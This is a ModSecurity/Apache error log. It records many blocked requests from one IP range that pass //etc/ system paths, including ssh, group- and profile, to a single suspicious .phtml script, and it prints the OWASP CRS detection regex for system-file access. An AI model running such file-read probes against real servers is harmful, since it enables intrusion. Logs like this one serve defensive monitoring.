[Fri Mar 20 06:53:53.624028 2026] [:error] [pid 21219:tid 140411716749056] [client 57.141.18.47:42212] [client 57.141.18.47] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/geoip.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZMfXLqtnMIWvjpaKMhwAAAoM"]
[Fri Mar 20 06:53:53.901433 2026] [:error] [pid 21219:tid 140411699963648] [client 57.141.18.110:42220] [client 57.141.18.110] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/vimrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZMfXLqtnMIWvjpaKMiQAAAoU"]
[Fri Mar 20 06:53:54.299503 2026] [:error] [pid 11642:tid 140411699963648] [client 57.141.18.103:42232] [client 57.141.18.103] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rwtab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZMrninkcc-iUj5ApQogAAA4U"]
[Fri Mar 20 06:53:54.567959 2026] [:error] [pid 26799:tid 140411599251200] [client 57.141.18.77:42236] [client 57.141.18.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/localtime"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZMta6ubjKNq_cu4bFYgAAA1E"]
[Fri Mar 20 06:53:54.882466 2026] [:error] [pid 15826:tid 140411540502272] [client 57.141.18.1:42240] [client 57.141.18.1] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors.256color"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZMuoXxyEfFpUF8f9z9QAAAVg"]
[Fri Mar 20 06:53:55.583090 2026] [:error] [pid 7235:tid 140411599251200] [client 57.141.18.99:42254] [client 57.141.18.99] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZM_qxLDW4GITHUkTXFwAAARE"]
[Fri Mar 20 06:53:55.933836 2026] [:error] [pid 9818:tid 140411699963648] [client 57.141.18.95:42260] [client 57.141.18.95] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/logrotate.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZM11pVZ5mVmJwsFMhggAAAEU"]
[Fri Mar 20 06:53:56.039096 2026] [:error] [pid 11167:tid 140411540502272] [client 57.141.18.69:42264] [client 57.141.18.69] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZNPHIg5MgXLBnicPrDQAAAdg"]
[Fri Mar 20 06:53:56.137806 2026] [:error] [pid 15826:tid 140411741927168] [client 57.141.18.68:42266] [client 57.141.18.68] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rsyslog.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZNOoXxyEfFpUF8f9z9gAAAUA"]
[Fri Mar 20 06:53:57.021860 2026] [:error] [pid 9818:tid 140411691570944] [client 57.141.18.73:42284] [client 57.141.18.73] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/.pwd.lock"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZNV1pVZ5mVmJwsFMhhAAAAEY"]
[Fri Mar 20 06:53:57.222300 2026] [:error] [pid 10189:tid 140411674785536] [client 57.141.18.98:42290] [client 57.141.18.98] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZNTJ3M9BSuKP7CAYLJAAAAIg"]
[Fri Mar 20 06:53:57.355514 2026] [:error] [pid 7893:tid 140411590858496] [client 57.141.18.104:42292] [client 57.141.18.104] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZNRCii7xarUs8iHZZzwAAAhI"]
[Fri Mar 20 06:53:57.840147 2026] [:error] [pid 21219:tid 140411649607424] [client 57.141.18.83:42300] [client 57.141.18.83] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZNfXLqtnMIWvjpaKMigAAAos"]
[Fri Mar 20 06:53:57.888862 2026] [:error] [pid 21219:tid 140411607643904] [client 57.141.18.119:42302] [client 57.141.18.119] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/anacrontab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZNfXLqtnMIWvjpaKMiwAAApA"]
[Fri Mar 20 06:53:58.556828 2026] [:error] [pid 26799:tid 140411658000128] [client 57.141.18.59:42312] [client 57.141.18.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subgid-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZNta6ubjKNq_cu4bFZAAAA0o"]
[Fri Mar 20 06:53:58.786574 2026] [:error] [pid 11642:tid 140411683178240] [client 57.141.18.0:42318] [client 57.141.18.0] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hostname"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZNrninkcc-iUj5ApQpgAAA4c"]
[Fri Mar 20 06:53:59.036442 2026] [:error] [pid 11167:tid 140411658000128] [client 57.141.18.11:42322] [client 57.141.18.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts.deny"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZN_HIg5MgXLBnicPrDgAAAco"]
[Fri Mar 20 06:53:59.289645 2026] [:error] [pid 7235:tid 140411548894976] [client 57.141.18.87:42328] [client 57.141.18.87] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/services"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZN_qxLDW4GITHUkTXGAAAARc"]
[Fri Mar 20 06:53:59.771649 2026] [:error] [pid 7893:tid 140411607643904] [client 57.141.18.16:42334] [client 57.141.18.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/locales.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZNxCii7xarUs8iHZZ0AAAAhA"]
[Fri Mar 20 06:54:00.199753 2026] [:error] [pid 7235:tid 140411708356352] [client 57.141.18.50:42346] [client 57.141.18.50] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/group-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZOPqxLDW4GITHUkTXGQAAAQQ"]
[Fri Mar 20 06:54:00.259266 2026] [:error] [pid 26799:tid 140411741927168] [client 57.141.18.71:42352] [client 57.141.18.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/favicon.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZONa6ubjKNq_cu4bFZgAAA0A"]
[Fri Mar 20 06:54:00.689319 2026] [:error] [pid 7235:tid 140411666392832] [client 57.141.18.82:42364] [client 57.141.18.82] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZOPqxLDW4GITHUkTXGwAAAQk"]
[Fri Mar 20 06:54:00.915466 2026] [:error] [pid 7235:tid 140411540502272] [client 57.141.18.72:42366] [client 57.141.18.72] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZOPqxLDW4GITHUkTXHAAAARg"]
[Fri Mar 20 06:54:01.183532 2026] [:error] [pid 7235:tid 140411641214720] [client 57.141.18.4:42370] [client 57.141.18.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/centos-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZOfqxLDW4GITHUkTXHQAAAQw"]
[Fri Mar 20 06:54:01.607412 2026] [:error] [pid 7235:tid 140411574073088] [client 57.141.18.65:42386] [client 57.141.18.65] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/issue"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZOfqxLDW4GITHUkTXHgAAARQ"]
[Fri Mar 20 06:54:01.935492 2026] [:error] [pid 7235:tid 140411683178240] [client 57.141.18.123:42396] [client 57.141.18.123] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZOfqxLDW4GITHUkTXHwAAAQc"]
[Fri Mar 20 06:54:02.811516 2026] [:error] [pid 9818:tid 140411582465792] [client 57.141.18.56:42432] [client 57.141.18.56] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/profile"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZOl1pVZ5mVmJwsFMhjAAAAFM"]
[Fri Mar 20 06:54:02.991949 2026] [:error] [pid 7893:tid 140411540502272] [client 57.141.18.2:42436] [client 57.141.18.2] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mtab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZOhCii7xarUs8iHZZ0gAAAhg"]
